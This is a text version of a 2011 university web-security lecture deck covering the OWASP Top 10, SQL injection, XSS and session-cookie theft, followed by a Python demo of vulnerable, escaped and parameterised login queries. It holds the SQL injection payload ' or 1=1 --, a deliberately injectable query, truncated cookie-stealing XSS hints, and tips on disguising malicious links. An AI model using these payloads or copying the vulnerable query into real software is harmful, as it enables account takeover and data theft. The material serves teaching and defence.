中央大学电子计算机中心多媒体与网路应用资讯推广课程.ppt (Central University Computer Center, Multimedia and Network Applications IT Outreach Course: Introduction to Web Application Security)

Format: PPT, 53 pages, 1.56 MB; uploaded 2019-03-20.
Slide 1: Central University Computer Center (中央大學電子計算機中心), Multimedia and Network Applications IT Outreach Course
Introduction to Web Application Security
Date: 2011/03/27. Lecturer: 張竟 (Computer Science, third year), cwebb dot tw at gmail dot com

Slide 2: Agenda
Banter; OWASP Top 10; SQL injection; XSS; cookie & session
(The same Agenda slide reappears as a section divider at slides 3, 8, 12, 18, 27 and 38.)

Slide 4: Don't do bad things!
Slides 5-6: Don't get caught!
Slide 7: Don't say I taught you this.

Slide 9: Web security?
Early days vs. today. Static vs. dynamic. Where there is code, there are vulnerabilities!

Slide 10: Ways to attack
OS; web server; web application.

Slide 11: Attack scenarios
Attack the web server: gain privileges, steal information, use it to attack users.
Attack other users: steal information, carry out further attacks.
Attacks may be composite.

Slides 14-15: OWASP Top 10 - 2010
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
(Slides 16-17 show the same list again.)

Slide 19: Injections
The hacker's fill-in-the-blanks game. Where can an attacker inject? Databases (MySQL, MS SQL, PostgreSQL ...), NoSQL stores, directory services (LDAP), system commands!

Slide 20: How SQL works in the web
A login page as the example. Client -> web server: request with id and pwd. Web server -> SQL server: select * from account where id='$id' and pwd='$pwd'. SQL server -> web server: return result. Web server -> client: return login success/failed.

Slide 21: Why SQL?
Widely used; stores most of a site's data; injection friendly.

Slide 22: How do injections work?
Using MySQL as the example:
    $query = "select * from account where id='$id' and pwd='$pwd'";
    $id = ' or 1=1 --
    select * from account where id='' or 1=1 --' and pwd='...'

Slide 23: Attack skills
union; blind attack.

Slide 24: Impact
Data stolen or modified; site privileges obtained; the whole site taken over.

Slide 25: How to defend
Use a safe API; filter and escape special characters; never put user input directly into the query; use a scanner to find vulnerabilities in the code.

Slide 26: Practice

Slide 28: XSS
Cross Site Scripting: running your code on someone else's website!

Slide 29: Background knowledge
HTTP GET; HTTP POST.

Slide 30: How to attack
Attack using POST/GET; the "scripting" ends up in the server's page; strange URLs.

Slide 31: How to attack
javascript /

Slide 32: Example
http:/ Orange")

Slide 33: What may happen?
Take you to a bad site; send your information to the attacker; just for fun!

Slide 34: Just For Fun: Samy
MySpace XSS attack. Samy is my hero! Infection.

Slide 35: Big sites are XSSable too
MySpace, Facebook, twitter, Plurk ...

Slide 36: How to defend
For the server: escape what has to be escaped; use a scanner to find vulnerabilities in the code.
For the user: be alert when you see a strange link; browser / antivirus software.

Slide 37: Practice

Slide 39: Background knowledge: cookie and session
A cookie is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.
The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases.
(Slides 40-41 carry no text.)

Slide 42: If you steal the cookie, you can ...

Slide 43: How to steal it?
(Slide 44 carries no text.)

Slide 45: Send the cookie to the cloud!
Use GET / POST to make the page send the cookie away / ex: ".join( ; the server side is simple, just keep the cookie.

Slides 46-48: Which idiot would click this crazy link?
http:/ (short URL services / 0rz.tw / goo.gl / bit.ly); hide it inside another page (e.g. an iframe with width and height set to 0 or 1); ugly URLs are EVERYWHERE.
Defences: https; check the user agent / headers; bind the session to an IP; *don't let the attack succeed in the first place*.

Slide 49: Lock the session to the user agent / header
    // Store the md5 of the User-Agent header in the session on the first request;
    // on later requests, end the script if the header no longer matches.
    if (isset($_SESSION['HTTP_USER_AGENT'])) {
        if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
            exit();
        }
    } else {
        $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
    }
But ... if you can steal the cookie, can't you get the header as well?

Slide 50: Practice
Slide 51: Q&A?
Slide 52: end

Slide 53: Reference
http://www.owasp.org/
http://en.wikipedia.org/
http://goo.gl/cA3a
http://goo.gl/IwGbX
http://goo.gl/uQ4I1
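The login query from slides 20-25, worked through as an added example that is not part of the deck: the same query built by string concatenation (slide 22), with single quotes escaped (slide 25, "filter and escape"), and with driver placeholders (slide 25, "safe API"), each run against the slide's `' or 1=1 --` input. The account table, usernames and passwords are constructed, and SQLite stands in for the MySQL server on the slides.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's MySQL 'account' table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table account (id text, pwd text)")
    db.executemany("insert into account values (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, user_id, pwd):
    """Slide 22: user input pasted straight into the SQL string.
    With id = ' or 1=1 -- the quote closes the literal, 1=1 is always true
    and -- comments out the password check, so every row comes back."""
    query = f"select * from account where id='{user_id}' and pwd='{pwd}'"
    return db.execute(query).fetchall()


def login_escaped(db, user_id, pwd):
    """Slide 25, weaker option: escape the quote character by doubling it,
    so the attacker's quote stays inside the string literal."""
    safe_id = user_id.replace("'", "''")
    safe_pwd = pwd.replace("'", "''")
    query = f"select * from account where id='{safe_id}' and pwd='{safe_pwd}'"
    return db.execute(query).fetchall()


def login_safe(db, user_id, pwd):
    """Slide 25, preferred option: a safe API. The SQL text is fixed and the
    values travel separately, so they can never change the query's structure."""
    query = "select * from account where id=? and pwd=?"
    return db.execute(query, (user_id, pwd)).fetchall()


def demo():
    """Rows returned by each variant for the slide's payload and for a real login."""
    db = make_db()
    payload = "' or 1=1 --"   # the $id value from slide 22
    return {
        "vulnerable_rows": len(login_vulnerable(db, payload, "anything")),  # 2: whole table
        "escaped_rows": len(login_escaped(db, payload, "anything")),        # 0
        "safe_rows": len(login_safe(db, payload, "anything")),              # 0
        "safe_real_login": len(login_safe(db, "alice", "s3cret")),          # 1
    }


if __name__ == "__main__":
    print(demo())
```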
